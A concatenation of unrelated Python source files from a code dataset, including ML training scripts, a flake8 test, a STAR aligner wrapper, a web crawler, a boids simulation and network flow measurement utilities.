LOSS_TOT.append(loss.item())\n LOSS_FIT.append(loss_fit.item())\n LOSS_CONSISTENCY.append(loss_consistency.item())\n if itr % test_freq == 0:\n print(f'Iter {itr} | Tradeoff Loss {loss:.4f} Consistency Loss {loss_consistency:.4f} Fit Loss {loss_fit:.4f}')\n\n # Optimize\n loss.backward()\n optimizer.step()\n\n train_time = time.time() - start_time\n print(f\"\\nTrain time: {train_time:.2f}\") # 182 seconds\n\n if not os.path.exists(\"models\"):\n os.makedirs(\"models\")\n\n # Save model\n if not os.path.exists(\"models\"):\n os.makedirs(\"models\")\n\n model_filename = f\"model_SS_{seq_len}step.pkl\"\n hidden_filename = f\"hidden_SS_{seq_len}step.pkl\"\n\n torch.save(nn_solution.ss_model.state_dict(), os.path.join(\"models\", model_filename))\n torch.save(x_hidden_fit, os.path.join(\"models\", hidden_filename))\n\n # Plot figures\n if not os.path.exists(\"fig\"):\n os.makedirs(\"fig\")\n\n # Loss plot\n fig, ax = plt.subplots(1, 1)\n ax.plot(LOSS_TOT, 'k', label='TOT')\n ax.plot(LOSS_CONSISTENCY, 'r', label='CONSISTENCY')\n ax.plot(LOSS_FIT, 'b', label='FIT')\n ax.grid(True)\n ax.legend(loc='upper right')\n ax.set_ylabel(\"Loss (-)\")\n ax.set_xlabel(\"Iteration (-)\")\n\n fig_name = f\"WT_SS_loss_{seq_len}step_noise.pdf\"\n fig.savefig(os.path.join(\"fig\", fig_name), bbox_inches='tight')\n\n # Hidden variable plot\n x_hidden_fit_np = x_hidden_fit.detach().numpy()\n fig, ax = plt.subplots(2, 1, sharex=True)\n ax[0].plot(y_id[:, 0], 'b', label='Measured')\n ax[0].plot(x_hidden_fit_np[:, 0], 'r', label='Hidden')\n ax[0].legend()\n ax[0].grid(True)\n\n #ax[1].plot(x_est[:, 1], 'k', label='Estimated')\n ax[1].plot(x_hidden_fit_np[:, 1], 'r', label='Hidden')\n ax[1].legend()\n ax[1].grid(True)\n\n # Simulate\n y_val = np.copy(y_fit)\n u_val = np.copy(u_fit)\n\n #x0_val = np.array(x_est[0, :])\n #x0_val[1] = 0.0\n x0_val = x_hidden_fit[0, :].detach().numpy() # initial state had to be estimated, according to the dataset description\n x0_torch_val = torch.from_numpy(x0_val)\n u_torch_val = torch.tensor(u_val)\n\n with torch.no_grad():\n x_sim_torch = nn_solution.f_sim(x0_torch_val[None, :], u_torch_val[:, None, :])\n y_sim_torch = x_sim_torch[:, 0]\n x_sim = y_sim_torch.detach().numpy()\n\n\n # Simulation plot\n fig, ax = plt.subplots(2, 1, sharex=True, figsize=(6, 7.5))\n #ax[0].plot(time_exp, q_ref, 'k', label='$q_{\\mathrm{ref}}$')\n ax[0].plot(time_exp, y_val, 'k', label='$y_{\\mathrm{meas}}$')\n ax[0].plot(time_exp, x_sim[:, 0], 'r', label='$\\hat y_{\\mathrm{sim}}$')\n ax[0].legend(loc='upper right')\n ax[0].grid(True)\n ax[0].set_ylabel(\"Voltage (V)\")\n\n ax[1].plot(time_exp, u_id, 'k', label='$u_{in}$')\n ax[1].set_xlabel(\"Time (s)\")\n ax[1].set_ylabel(\"Voltage (V)\")\n ax[1].grid(True)\n ax[1].set_xlabel(\"Time (s)\")\n","sub_path":"examples/CTS_example/CTS_SS_fit_multistep.py","file_name":"CTS_SS_fit_multistep.py","file_ext":"py","file_size_in_byte":7153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"97956933","text":"# coding=utf-8\n# Created by OhBonsai at 2018/3/13\n\nfrom subprocess import CalledProcessError, check_output as run\n\nFLAKE8_COMMAND = 'flake8'\n\nFLAKE8_INPUTS = [\n 'app',\n 'tests'\n]\n\n\ndef pytest_generate_tests(metafunc):\n metafunc.parametrize('folder', FLAKE8_INPUTS)\n\n\ndef test_flake8(folder):\n \"\"\" Run skylines package through flake8 \"\"\"\n try:\n run([FLAKE8_COMMAND, folder])\n except CalledProcessError as e:\n print(e.output)\n raise AssertionError('flake8 has found errors.')\n except OSError:\n raise OSError('Failed to run flake8. Please check that you have '\n 'installed it properly.')\n\n","sub_path":"tests/test_flake8.py","file_name":"test_flake8.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"259213817","text":"#!/usr/bin/env python\n__author__ = \"etseng@pacb.com\"\n\"\"\"\nWrapper for running STARlong.\nParameters are pre-set according to:\n\n\n\"\"\"\nimport shutil\nimport subprocess\nimport tempfile\nfrom pathlib import Path\n\nimport typer\n\nfrom cupcake import version_callback\n\napp = typer.Typer(name=\"cupcake.sequence.STARwrapper\", help=\"Wrapper for running STAR\")\n\n\nCMD_STARlong = \"/home/UNIXHOME/etseng/software_downloads/STAR-2.5.3a/bin/Linux_x86_64/STAR --runMode alignReads --outSAMattributes NH HI NM MD --readNameSeparator space --outFilterMultimapScoreRange 1 --outFilterMismatchNmax 2000 --scoreGapNoncan -1 --scoreGapGCAG -4 --scoreGapATAC -8 --scoreDelOpen -1 --scoreDelBase -1 --scoreInsOpen -1 --scoreInsBase -1 --alignEndsType Local --seedSearchStartLmax 50 --seedPerReadNmax 100000 --seedPerWindowNmax 1000 --alignTranscriptsPerReadNmax 100000 --alignTranscriptsPerWindowNmax 10000\"\nCMD_STAR2_format = (\n CMD_STARlong\n + \" --twopassMode None --runThreadN {c} --genomeDir {d} --readFilesIn {i}\"\n)\n\n\ndef run_STAR(in_fasta, out_sam, genome_dir, cpus):\n with tempfile.mkdtemp(prefix=\"STARtmp\") as tmp_dir:\n in_fasta = Path(in_fasta)\n out_sam = Path(out_sam)\n cmd = CMD_STAR2_format.format(c=cpus, d=genome_dir, i=in_fasta)\n if subprocess.check_call(cmd, shell=True, cwd=tmp_dir) != 0:\n raise subprocess.CalledProcessError(f\"ERROR RUNNING CMD: {cmd}\")\n\n shutil.move(Path(tmp_dir, \"Aligned.out.sam\"), out_sam)\n\n\n@app.command(name=\"\")\ndef main(\n genome_dir: str = typer.Argument(...),\n in_fasta: str = typer.Argument(...),\n out_sam: str = typer.Argument(...),\n cpus: int = typer.Option(10, help=\"Number of threads (default: 10)\"),\n version: bool = typer.Option(\n None,\n \"--version\",\n callback=version_callback,\n is_eager=True,\n help=\"Prints the version of the SQANTI3 package.\",\n ),\n) -> None:\n\n run_STAR(in_fasta, out_sam, genome_dir, cpus)\n\n\nif __name__ == \"__main__\":\n typer.run(main)\n","sub_path":"src/cupcake/sequence/STARwrapper.py","file_name":"STARwrapper.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"616276162","text":"from bs4 import BeautifulSoup\nfrom typing import Generator\nfrom .data_source import AnimeResSearch\n\nget = AnimeResSearch.get\n\n\nclass AnimeResFilter:\n __slots__ = (\"data\", \"html\", \"types\")\n\n def __init__(self, data: Generator, html: BeautifulSoup = None):\n \"\"\"\n :param data: 获取的资源的生成器\n :param html: 整个页面\n \"\"\"\n self.data = dict()\n self.html = html\n self.types = []\n if data:\n for value in data:\n if value[\"type\"] in self.types:\n self.data[value[\"type\"]].append(value)\n else:\n self.types.append(value[\"type\"])\n self.data[value[\"type\"]] = [value]\n\n async def type_msg(self, bot) -> str:\n \"\"\"\n :param bot: 用于发送获取的信息\n :return: 当信息获取到时返回字符串让机器人发送\n 当获取到类型时表示有资源\n 如果资源类型只有一条便发送这一条数据\n 否则发送所有类型\n \"\"\"\n if self.types:\n if len(self.types) == 1:\n await self.confirm_type_send(bot, self.data[self.types[0]][0])\n await bot.send(\"获取类型如下:\\n\" + \"\\n\".join([f\"{i}. {t}\" for i, t in enumerate(self.types)]))\n else:\n await bot.finish(\"未发现资源,先确认是否存在或输入是否有误!请重新输入。\")\n return \"请选择所需类型名或数字索引\"\n\n async def confirm_type_msg(self, bot, text: str):\n \"\"\"\n :param bot: 用于发送获取的信息\n :param text: 关键字文本\n 判断文本是否能转为数字\n 如果依然是字符串\n 便通过字符串判断是否是以上类型中的一个,如果是便发送数据\n 是数字\n 查看是否能类型中的索引,如果是便发送数据\n \"\"\"\n try:\n text = int(text)\n except ValueError:\n ...\n if isinstance(text, str):\n for t in self.types:\n if t in text:\n await self.confirm_type_send(bot, self.data[t][0])\n continue\n else:\n if 0 <= text < len(self.types):\n await self.confirm_type_send(bot, self.data[self.types[text]][0])\n await bot.finish(\"您输入类型有误,请重新进行资源搜索!\")\n\n @staticmethod\n async def confirm_type_send(bot, data: dict):\n \"\"\"\n :param bot: 用于发送信息\n :param data: 获取的资源中的数据\n \"\"\"\n text = f\"名称:{data['title'][:80]}...\\n大小:{data['size']}\"\n magnet = await AnimeResSearch.get_magnet(data[\"href\"])\n await bot.send(text)\n await bot.finish(magnet)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"src/plugins/animeres/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"157089834","text":"from subprocess import Popen, PIPE\nfrom threading import Thread\nfrom queue import Queue, Empty\n\nimport atexit\nimport os\nimport sys\nagent_processes = [None, None]\nt = None\nq = None\ndef cleanup_process():\n global agent_processes\n for proc in agent_processes:\n if proc is not None:\n proc.kill()\ndef enqueue_output(out, queue):\n for line in iter(out.readline, b''):\n queue.put(line)\n out.close()\ndef js_agent(observation, configuration):\n \"\"\"\n a wrapper around a js agent\n \"\"\"\n global agent_processes, t, q\n\n agent_process = agent_processes[observation.player]\n ### Do not edit ###\n if agent_process is None:\n if \"__raw_path__\" in configuration:\n cwd = os.path.dirname(configuration[\"__raw_path__\"])\n else:\n cwd = os.path.dirname(__file__)\n agent_process = Popen([\"node\", \"main.js\"], stdin=PIPE, stdout=PIPE, stderr=PIPE, cwd=cwd)\n agent_processes[observation.player] = agent_process\n atexit.register(cleanup_process)\n\n # following 4 lines from https://stackoverflow.com/questions/375427/a-non-blocking-read-on-a-subprocess-pipe-in-python\n q = Queue()\n t = Thread(target=enqueue_output, args=(agent_process.stderr, q))\n t.daemon = True # thread dies with the program\n t.start()\n if observation.step == 0:\n # fixes bug where updates array is shared, but the first update is agent dependent actually\n observation[\"updates\"][0] = f\"{observation.player}\"\n \n # print observations to agent\n agent_process.stdin.write((\"\\n\".join(observation[\"updates\"]) + \"\\n\").encode())\n agent_process.stdin.flush()\n\n # wait for data written to stdout\n agent1res = (agent_process.stdout.readline()).decode()\n _end_res = (agent_process.stdout.readline()).decode()\n\n while True:\n try: line = q.get_nowait()\n except Empty:\n # no standard error received, break\n break\n else:\n # standard error output received, print it out\n print(line.decode(), file=sys.stderr, end='')\n\n outputs = agent1res.split(\"\\n\")[0].split(\",\")\n actions = []\n for cmd in outputs:\n if cmd != \"\":\n actions.append(cmd)\n return actions","sub_path":"kaggle_environments/envs/lux_ai_2021/test_agents/js_simple/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"190830751","text":"import argparse\nimport pickle\nimport numpy as np\nimport nltk\n\nfrom tqdm import tqdm\n\nfrom prep_data import *\n# def prep_data():\n# nltk.download('brown')\n# nltk.download('universal_tagset')\n\n# corpus = nltk.corpus.brown.tagged_words()\n# return [(word, nltk.tag.map_tag('brown','universal',tag)) for word,tag in corpus]\n\n\ndef calculate_transition_probs(data,tag_dict):\n # Function to calculate bigram counts of tags given a list of list of tuples, having (word,tag)\n # where first ele of each tag-list is , last is \n # tag_dict is dict containing list of all unique tags present in data\n # lambda_interpolation is the coefficient for linear interpolation\n bigram_counts = np.zeros((len(tag_dict),len(tag_dict)))\n # monogram_counts = np.zeros((len(tag_dict),1))\n for sentence in data:\n # monogram_counts[tag_dict[sentence[0][1]]] += 1\n for i in range(1,len(sentence)):\n bigram_counts[tag_dict[sentence[i][1]],tag_dict[sentence[i-1][1]]]+=1\n # monogram_counts[tag_dict[sentence[i][1]]] += 1\n #do discounting and smoothing here\n # monogram_probs = monogram_counts.mean()\n bigram_probs = bigram_counts/(bigram_counts.sum(axis=1)+1e-10)\n return bigram_probs\n\ndef calculate_emmision_probs(data,tag_dict,word_dict,lambda_interpolation):\n # data here is a list of list of tuples, having (word,tag)\n emmision_probs = np.zeros((len(word_dict),len(tag_dict)))\n for k in data:\n for i in k: \n # print(i)\n emmision_probs[word_dict[i[0]],tag_dict[i[1]]] += 1\n return ((1-lambda_interpolation)*emmision_probs/((emmision_probs.sum(axis=1).reshape(-1,1))+1e-10)) + lambda_interpolation/(1e+8)\n\n\nclass Probs:\n def __init__(self,sents,word_dict,tag_dict,text_file_path='wiki-en-train.norm_pos'):\n\n # data,self.word_dict,self.tag_dict = preprocess(text_file_path)\n self.emmision_probs = calculate_emmision_probs(sents,tag_dict,word_dict,0.1)\n self.transition_probs = calculate_transition_probs(sents,tag_dict) \n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", help=\"Model file\")\n # parser.add_argument(\"--train-file\", help=\"Input file to be decoded\")\n args = parser.parse_args()\n data = DataLoader()\n data.preprocess_hmm()\n word_dict,tag_dict = data.word_dict,data.tag_dict\n for i in range(5):\n print(\"Training Fold no. {}\".format(i))\n train,test = data.get_fold(i)\n p = Probs(train,word_dict,tag_dict)\n\n # print(p.word_dict)\n # print(p.tag_dict,p.word_dict['.'],p.emmision_probs[31,13],p.transition_probs[0,:])\n pickle.dump(p,open(args.model,'wb'))\n\n\n","sub_path":"A1/170020016_170050107_170070015_Assignment1/HMM/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"564152360","text":"#!/usr/bin/python2\nimport turtle\nimport math\nimport random\n \n'''\nREGLE 1 :\n- OBTENIR POSITION MOYENNE DE TOUT LES BOIDS : positionMoyenne()\n- CALCULER LE VECTEUR VITESSE BOID[i] VERS LA POSITION MOYENNE : AB : xB - xA, yB - yA : vecteurVitesse()\n- TRANSFORMER VITESSE EN ANGLE : speed2heading()\n'''\n\nboid=[] #tableau d'oiseaux\nN=4 #nombre de oiseau\n#zoneRepu = 3\n\n#REGLE 1\ndef positionMoyenne():\n sx=0\n sy=0\n x=0\n y=0\n for i in range(N):\n x, y = boid[i].position()\n sx += x\n sy += y\n return sx / N, sy / N\n\ndef vecteurVitesse( x, y, xposM, yposM ):\n return xposM - x, yposM - y\n\ndef speed2heading(x,y):\n return math.atan2(y,x)*57.17\n\n#REGLE 2\ndef angleMoyen():\n a = 0\n for i in range(N):\n a += boid[i].position()\n return a/N\n\n#regle 2\ndef regle2():\n theta = angleMoyen() / 57.17 #57,17 360 -> 2pi\n return math.cos(theta), math.sin(theta)\n\n\nposx=0;\nposy=0;\n\nfor i in range(N):\n boid.append(turtle.Turtle())\n\n#initialisation des parametres\nfor i in range(N):\n boid[i].penup() #ne pas tracer\n boid[i].setposition(random.randint(-100, 100), random.randint(-100, 100))\n boid[i].setheading(random.randint(0,359)) #angle de l'oiseau en degree\n boid[i].color(random.random(), random.random(), random.random())\n boid[i].pendown() #tracer deplacement\n\nwhile True:\n\n #regle 1 : tout les oiseaux vont au centre\n \n for i in range(N):\n posx, posy = positionMoyenne()\n posx, posy = vecteurVitesse( boid[i].xcor(), boid[i].ycor(), posx, posy)\n boid[i].setheading( speed2heading( posx, posy ) )\n boid[i].forward(1)\n\nraw_input()#attend que l'utilisateur frappe une touche pour quitter\n\n\n","sub_path":"TP1/tp1V1.py","file_name":"tp1V1.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"370249739","text":"from apogee.models import BayesianModel, DiscreteNaiveBayes\nimport apogee as ap\n\ndata = ap.random.random_array(1000, 10, seed=0)\nlabels = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\"]\nx = ap.vstack(([ap.encoding.discretise(data[:, i], 2) for i in range(10)])).T\n\n# build a Naive Bayes model\nnaive = DiscreteNaiveBayes()\nnaive.fit(x[:, 1:], x[:, 0], labels=labels)\n\n# build the equivalent Naive Bayes with the BayesianModel object\nb = BayesianModel()\nb.add(\"a\")\nfor i in range(1, 10):\n b.add(labels[i], parents=[\"a\"])\nb.fit(x, labels=labels, normed=True)\n\nfor i in range(100):\n n, f = (naive.predict([x[i][1:]]), b.predict(x[i][1:], labels[1:], \"a\")[\"a\"])\n print(n, f)\n\n","sub_path":"apogee/examples/bayes_to_naive_bayes.py","file_name":"bayes_to_naive_bayes.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"254596512","text":"from rest_framework.exceptions import ValidationError\nfrom django.http.response import HttpResponse\nimport itertools\nimport xlwt\nimport xlrd\n\n\ndef export_excel(data, name, fields):\n response = HttpResponse(content_type='application/ms-excel')\n response['Content-Disposition'] = f'attachment;filename={name}.xls'\n\n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet(name)\n \n # 创建标头\n for col, field in enumerate(fields):\n ws.write(0, col, field[1])\n\n for row, item in enumerate(data):\n for col, field in enumerate(fields):\n ws.write(row + 1, col, item.get(field[0]))\n\n wb.save(response)\n return response\n\n\ndef import_excel(self, fields):\n file = self.request.FILES.get('file')\n\n if not file:\n raise ValidationError({'message': '文件不存在'})\n\n wb = xlrd.open_workbook(file_contents=file.read())\n ws = wb.sheet_by_index(0)\n\n row_fields = [item[1][0] for item in itertools.product(ws.row_values(0), fields) if item[0] == item[1][1]]\n for row in range(1, ws.nrows):\n data = {item[0]: item[1] for item in zip(row_fields, ws.row_values(row)) if item[1] != ''}\n self.get_serializer(data=data).is_valid(raise_exception=True)\n yield data\n","sub_path":"utils/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"178450894","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 30 17:59:30 2018\n\n@author: steven\n\"\"\"\nfrom teacher_spider import url_manager\nfrom teacher_spider import html_downloader\nfrom teacher_spider import html_parser\nfrom teacher_spider import html_outputer\n\n\nclass SpiderMain(object):\n def __init__(self):\n self.urls=url_manager.UrlManager()\n self.downloader=html_downloader.HtmlDownloader()\n self.parser=html_parser.HtmlParser()\n self.outputer=html_outputer.HtmlOutputer()\n \n def craw(self,root_url):\n count=0\n self.urls.add_new_url(root_url)\n while self.urls.has_new_url():\n try:\n new_url=self.urls.get_new_url()\n # print('craw %d : %s'%(count,new_url))\n print('%d'%count)\n html_cont=self.downloader.download(new_url)\n new_urls,new_data=self.parser.parse(new_url,html_cont)\n self.urls.add_new_urls(new_urls)\n print(new_data['name'])\n print(new_data['paper1'])\n print(new_data['paper2'])\n print(new_data['paper3'])\n self.outputer.collect_data(new_data)\n if count==1000:\n break\n \n count=count+1\n except:\n print('craw failed')\n \n self.outputer.output_html()\n \n \nif __name__==\"__main__\":\n root_url=\"http://www.cs.tsinghua.edu.cn/publish/cs/4797/index.html\"\n obj_spider=SpiderMain()\n obj_spider.craw(root_url)","sub_path":"teacher_spider/spider_main.py","file_name":"spider_main.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"258816884","text":"import numpy as np\nimport pylab as pl\nimport time\nimport mod2011 as mod\nfrom scipy.integrate import odeint \nfrom numpy import fft\n\nt0=time.time()\npars=mod.get_params()\npars[\"f\"]=1000\n\ntf=10/pars[\"f\"]\nN=10000\nts=np.linspace(0,tf,N)\n\nh0, t0, n0, p0=mod.get_stat(pars, pars[\"PFDlight_0\"])\nX0=np.array([h0, n0, t0])\n\nsols=odeint(mod.get_sys, X0, ts, args=(pars,), hmax=0.001)\n\npfds=np.array([mod.get_PFD_osc(pars, t) for t in ts])\nF=mod.fluo_TS(pars, sols[:,1], pfds)\n\nLcos=np.cos(2*np.pi*pars[\"f\"]*ts)\nLsin=np.sin(2*np.pi*pars[\"f\"]*ts)\n\nFn=F-F.mean()\n\ncr=Fn@Lcos\nci=Fn@Lsin\n \nfs=N/tf\nSp=fft.fft(Fn)\nfreqs=fft.fftfreq(len(Fn))*fs \nax=pl.subplot(111)\nax.plot(freqs, np.abs(Sp))\nax.set_xlabel('Frequency in Hertz [Hz]')\nax.set_ylabel('Frequency Domain (Spectrum) Magnitude')\nax.set_xlim(-5*pars[\"f\"], 5*pars[\"f\"])\npl.savefig(\"fft%s.png\"%pars[\"f\"])\npl.clf()\namp=np.sqrt(cr**2+ci**2)\nph=np.arctan(ci/cr)\nprint(amp,ph)\n\npl.subplot(211)\npl.plot(ts,pfds)\npl.subplot(212)\npl.plot(ts,F)\npl.savefig(\"lala.png\")\n\nprint(time.time()-t0)\n","sub_path":"ebenhoh2011_osc/osc.py","file_name":"osc.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"48679202","text":"from matplotlib import pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import animation\n\nfig = plt.figure()\nax = Axes3D(fig)\n\ndef update_dot(num, dataLines, lines):\n for line, data in zip(lines, dataLines):\n line.set_data(data[0:2, num-1:num])\n line.set_3d_properties(data[2,num-1:num])\n return lines\n\ndef update(num, data, line):\n line.set_data(data[:2, :num])\n line.set_3d_properties(data[2, :num])\n\ndef gen1():\n phi = 10*np.pi/180\n a = 90*np.pi/180\n q = 1.9*pow(10, -19)\n B = 0.05\n m = 9.1*pow(10, -31)\n v = pow(10, 8)\n dt = 0.000000000001\n t = 0\n x, y, z = 0, m*v/(q*B), 0\n vx = v*np.sin(phi)*np.sin(a)+q*B*0*dt/(2*m)\n vy = 0-q*B*vx*dt*np.sin(a)/(2*m)\n vz = v*np.cos(phi)\n x += vx*dt\n y += vy*dt\n z += vz*dt\n c = 0\n while(c!=100000):\n c += 1\n vx0 = vx\n vx += q*B*vy*dt/m\n vy -= q*B*vx0*dt/m\n vz = vz\n x += vx*dt\n y += vy*dt\n z += vz*dt\n yield np.array([x, y, z])\ndef ani():\n N = 10000000\n data1 = np.array(list(gen1())).T\n line1, = ax.plot(data1[0, 0:1], data1[1, 0:1], data1[2, 0:1], color=\"blue\")\n\n ax.set_xlabel('X')\n ax.set_xlim3d([-0.01, 0.01])\n ax.set_ylabel('Y')\n ax.set_ylim3d([-0.01, 0.01])\n ax.set_zlabel('Z')\n ax.set_zlim3d([0, 1])\n\n ani = animation.FuncAnimation(fig, update, N, fargs=(data1, line1), interval=1)\n #ani.save('animation.gif', writer='imagemagick', fps=15)\n plt.show()\n\ndef main(): ani()\n \nif __name__ == \"__main__\": main()","sub_path":"fost/88.py","file_name":"88.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"516136901","text":"# coding: utf8\nimport random\n\ndef get_banded_flows(flows, lo_bound, hi_bound):\n\t'''\n\t返回数据流集合flows中长度在[lo_bound, hi_bound]之间的数据流;\n\t如果hi_bound < 0,则返回所有长度大于等于lo_bound的数据流\n\t'''\n\tres = dict()\n\tfor key, cnt in flows.items():\n\t\tif cnt >= lo_bound:\n\t\t\tif (hi_bound >= 0 and cnt <= hi_bound) or hi_bound < 0:\n\t\t\t\tres[key] = cnt\n\treturn res\n\t\ndef banded_ae_calc(flows1, flows2, lo_bound, hi_bound):\n\t'''\n\t首先从数据流集合flows1中提取出其长度在[lo_bound, hi_bound]之间的数据流,\n\t之后以flows2中相应数据的长度为参照计算其平均误差\n\t'''\n\ttempFlows = get_banded_flows(flows1, lo_bound, hi_bound)\n\tae = 0.0\n\tfor key, cnt in tempFlows.items():\n\t\ttemp = 0\n\t\tif key in flows2:\n\t\t\ttemp = flows2[key]\n\t\tae = ae + abs(temp - cnt)\n\tae = ae/len(tempFlows)\n\treturn ae\n\ndef banded_f1score_calc(flows1, flows2, lo_bound, hi_bound):\n\t'''\n\t首先在flows1中提取出长度在[lo_bound, hi_bound]中的数据流tempFlows1,之后\n\t再从flows2中提取出长度在[lo_bound, hi_bound]中的数据流tempFlows2,然后计算\n\ttempFlows1和tempFlows2的交集的容量\n\t'''\n\ttempFlows1 = get_banded_flows(flows1, lo_bound, hi_bound)\n\ttempFlows2 = get_banded_flows(flows2, lo_bound, hi_bound)\n\tc = 0\n\tfor key in tempFlows1.keys():\n\t\tif key in tempFlows2:\n\t\t\tc = c + 1\n\tif 0 == len(tempFlows1):\n\t\trr = 0\n\telse:\n\t\trr = float(c)/len(tempFlows1)\n\tif 0 == len(tempFlows2):\n\t\tpr = 0\n\telse:\n\t\tpr = float(c)/len(tempFlows2)\n\tif 0 == pr + rr:\n\t\tf1score = 0\n\telse:\n\t\tf1score = 2*rr*pr/(pr + rr)\n\treturn f1score\n\n\ndef banded_are_calc(realFlows, measuredFlows, lo_bound, hi_bound):\n\t'''\n\t计算对长度在一定范围之内的数据流的检测的平均相对误差\n\t'''\n\tflows1 = get_banded_flows(realFlows, lo_bound, hi_bound)\n\tflows2 = get_banded_flows(measuredFlows, lo_bound, hi_bound)\n\t\n\t'''Calculate the Average Relative Error'''\n\tare = 0.0\n\tfor key, cnt in flows1.items():\n\t\ttemp = 0\n\t\tif key in flows2:\n\t\t\ttemp = flows2[key]\n\t\tare = are + abs(temp - cnt)/float(cnt)\n\tare = are/len(flows1)\n\treturn are\n\n\ndef get_rand_flow_id():\n\t\"\"\"Generate a random flow identifier\"\"\"\n\tlst = []\n\tfor i in range(8):\n\t\titem = random.randint(1, 255)\n\t\tlst.append(str(item))\n\tsrcip = \".\".join(lst[0:4])\n\tdstip = \".\".join(lst[4:8])\n\tproto = random.randint(1, 2)\n\tif 1 == proto:\n\t\tproto = \"6\"\n\telif 2 == proto:\n\t\tproto = \"17\"\n\tsrcport = str(random.randint(1, 65535))\n\tdstport = str(random.randint(1, 65535))\n\tpkt = {\"srcip\": srcip, \"dstip\": dstip, \"proto\": proto, \"srcport\": srcport, \"dstport\": dstport}\n\treturn pkt\n","sub_path":"network/flow_tools.py","file_name":"flow_tools.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"110142811","text":"from intcode import Intcode\nimport itertools\n\narray = [3,26,1001,26,-4,26,3,27,1002,27,2,27,1,27,26,\n27,4,27,1001,28,-1,28,1005,28,6,99,0,0,5]\n\nlistOfPhaseSettings = (list(itertools.permutations(range(5,10), 5)))\nprint(listOfPhaseSettings)\n\ndef runAmplifierSeries(phaseSettings):\n i = 0\n userInput = 0\n while i < 5:\n print(userInput)\n userInput = Intcode(array, userInput, phaseSettings[i])\n\n i += 1\n return userInput\n\n\nresult = [(runAmplifierSeries(settings), settings) for settings in listOfPhaseSettings]\n\nprint(max(result))\n","sub_path":"Day7/part 2/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"562086269","text":"import tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nfrom time import time\r\nimport sys \r\nimport os\r\n\r\ntf.logging.set_verbosity(tf.logging.INFO)\r\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\r\n\r\nfrom utils.write_tfrecords import decode\r\nfrom models import star_model\r\nfrom utils import configurator, io_utils\r\n\r\ndef data_iterator(tfr_file, epoch=1):\r\n \"\"\" \"\"\"\r\n dataset = tf.data.TFRecordDataset(tfr_file)\r\n dataset = dataset.map(decode)\r\n # TODO: does this value make sense for buffer size?\r\n dataset = dataset.shuffle(1000)\r\n return dataset.make_initializable_iterator()\r\n\r\nif __name__==\"__main__\":\r\n import sys\r\n config_file = sys.argv[1]\r\n\r\n config = configurator.Configurator(config_file)\r\n beta = config.beta\r\n k = config.k\r\n epoch = config.num_epochs\r\n learning_rate = config.learning_rate\r\n \r\n train_tfr = config.train_tfr\r\n test_tfr = config.test_tfr\r\n\r\n # TODO: where do matrix dims go? config?\r\n star = star_model.StarModel(4, 16, k, beta)\r\n\r\n test_it = data_iterator(test_tfr)\r\n s,p,t = test_it.get_next()\r\n accuracy = star.accuracy(s,p,t)\r\n\r\n training_it = data_iterator(train_tfr,epoch=epoch)\r\n single, pair, truth = training_it.get_next()\r\n loss = star.loss(single, pair, truth)\r\n optimizer = tf.train.AdagradOptimizer(learning_rate)\r\n minimizer = optimizer.minimize(loss)\r\n\r\n #initialize_iter = initializable_iterator.initializer\r\n \r\n init_op = tf.global_variables_initializer()\r\n epoch_loss = []\r\n saver = tf.train.Saver()\r\n with tf.Session() as sess:\r\n sess.run(init_op)\r\n start_time = time()\r\n training_loss = []\r\n\r\n test_err = []\r\n for step in range(epoch):\r\n sess.run(training_it.initializer)\r\n epoch_loss = []\r\n while True:\r\n try:\r\n _, loss_val = sess.run([minimizer, loss])\r\n epoch_loss.append(loss_val)\r\n except tf.errors.OutOfRangeError:\r\n print('done', step)\r\n break\r\n\r\n training_loss.append(epoch_loss)\r\n\r\n epoch_test_err = []\r\n\r\n sess.run(test_it.initializer)\r\n while True:\r\n try:\r\n epoch_test_err.append(sess.run(accuracy))\r\n except tf.errors.OutOfRangeError:\r\n break \r\n test_err.append(sum(epoch_test_err)/float(len(epoch_test_err)))\r\n\r\n full_model_path = io_utils.model_path(config.model_name)\r\n saver.save(sess, full_model_path)\r\n 